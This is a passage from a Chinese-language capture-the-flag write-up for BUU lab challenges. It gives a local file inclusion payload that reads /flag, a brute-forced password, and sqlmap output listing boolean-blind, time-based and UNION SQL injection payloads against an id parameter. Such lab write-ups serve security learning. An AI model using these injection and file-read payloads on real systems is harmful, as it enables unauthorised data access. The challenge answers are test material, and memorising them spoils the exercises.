这个题目是一个 LFI 题目,明明很简单,但是 flag 真的很难找,flag.txt,flag.php 等等都试过了,最后发现就在 /flag 里,没有任何后缀名。
1
?file=/flag
0x03 BUU BRUTE 1
虽然我知道官方是想让大家学习如何去爆破,自己为难自己有点不好,密码 6490 取到 Flag
0x04 BUU SQL COURSE 1
SQL 注入题目,注入点在 news 的 id 参数,用 SQLite 或者手动拼一下注入都可以。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 9706=9706
Type: time-based blind Title: MySQL > 5.0.12 AND time-based blind (heavy query) Payload: id=1 AND 5371=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: id=-4060 UNION ALL SELECT CONCAT(0x716b717a71,0x4d6a57437a614b6c456a6541496651486e434862487557455469644874714d6370474458426a6976,0x7170766271),NULL-- - ---